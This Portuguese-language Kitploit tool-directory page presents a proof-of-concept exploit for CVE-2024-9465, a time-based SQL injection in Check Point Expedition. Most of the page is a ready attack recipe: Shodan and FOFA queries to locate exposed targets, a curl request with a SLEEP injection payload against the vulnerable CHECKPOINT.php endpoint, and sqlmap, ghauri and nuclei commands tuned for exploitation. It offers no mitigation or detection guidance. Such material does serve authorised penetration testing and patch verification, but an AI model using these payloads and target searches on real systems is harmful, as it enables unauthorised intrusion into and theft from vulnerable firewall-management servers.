Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mustafaakalin/cve-2024-9465
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmustafaakalin/cve-2024-9465

CVE-2024-9465

Prova de conceito de exploit para CVE-2024-9465, uma injeção SQL baseada em tempo no Check Point Expedition, com consultas de busca Shodan/FOFA e integração com sqlmap, ghauri e nuclei.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9465

Injeção SQL no Checkpoint via Ataque Baseado em Tempo (CVE-2024-9465)

PESQUISA SHODAN

root@kitploit:~
https://www.shodan.io/search?query=html%3A%22Expedition+Project%22

html:"Expedition Project"

PESQUISA FOFA

root@kitploit:~
https://en.fofa.info/
body="Expedition Project" || title="Expedition Project"

USO

root@kitploit:~
python3 CVE-2024-9465.py -u https://domain.com

Comando cURL

root@kitploit:~
curl -X POST "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=import&type=test&project=pandbRBAC&signatureid=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(10)))horizon3)" \
-w "Total Time: %{time_total}\n" \
-k

Comando Ghauri

root@kitploit:~
ghauri --url "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--technique T \
--dbms mysql \
--time-sec 10 \
-p signatureid \
--threads 10

Comando SQLMAP

root@kitploit:~
sqlmap -u "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--dbms=mysql \
--level 5 --risk 3 \
--time-sec=10 \
--technique=T \
--tamper=space2comment \
--batch --random-agent -v 3

Comando Nuclei

root@kitploit:~
nuclei -u https://domain.com -t CVE-2024-9465.yaml -v
Baixar ferramenta